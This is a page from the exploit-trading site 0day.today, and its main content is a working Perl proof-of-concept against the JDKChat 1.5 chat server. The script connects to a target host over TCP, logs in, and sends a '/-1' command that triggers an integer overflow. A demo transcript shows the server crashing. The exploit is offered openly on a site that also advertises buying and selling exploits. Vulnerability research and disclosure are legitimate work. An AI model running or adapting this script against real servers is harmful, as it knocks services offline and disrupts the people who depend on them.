0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
JDKChat 1.5 Remote Integer Overflow PoC
======================================= JDKChat 1.5 Remote Integer Overflow PoC ======================================= #!/usr/bin/perl # # Title: JDKChat v1.5 Remote Integer Overflow PoC # # Summary: JDKChat is a simple C++ chat server for GNU/Linux systems. # Users can connect to it through a simple tcp client like telnet. # # WebSite : http://www.jdkoftinoff.com/ # # ---------------------------- Demo --------------------------------- # aleks@tux ~ $ telnet 192.168.0.1 7777 # Trying 192.168.0.1... # Connected to 192.168.0.1. # Escape character is '^]'. # Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd. # http://www.jdkoftinoff.com/ # and modified by Aditya Godbole (urwithaditya@gmx.net) # Commands available: # /who -- (list all users along with their connection numbers) # /exit -- (exit chat room) # /local -- (toggle local mode for your telnet session) # /[connection number] message -- (send private message to user at # specified connection number) # # # JDKCHAT: Aleks just entered the room. # JDKCHAT: Users = Aleks:0 # Aleks > # # # // And after we run the PoC : # # JDKCHAT: PwNzOr just entered the room. # Aleks >Connection closed by foreign host. # aleks@tux ~ $ # # ---------------------------- /Demo -------------------------------- # # # Vulnerability discovered by n3tpr0b3 & LiquidWorm # # n3tpr0b3 [AT] gmail [.] com # # 12.03.2009 # use IO::Socket; if ($#ARGV != 1) { print " JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- # Usage : jdkchat_poc.pl SrvIP SrvPort # # Greetz to LiquidWorm # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n"; exit; } my $dupsa = new IO::Socket::INET ( PeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", Proto => "tcp" ) or die "Could not connect to $ARGV[0]: $!\n"; sleep 1; print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d"; print "#--> Loged on t3h JDKChat server...\n"; sleep 1; print "#--> Sending our evil command... \n"; sleep 2; print $dupsa "\x2f\x2d\x31\x0d"; close($dupsa); print "#--> Server pwned... \n"; # 0day.today [2024-07-08] #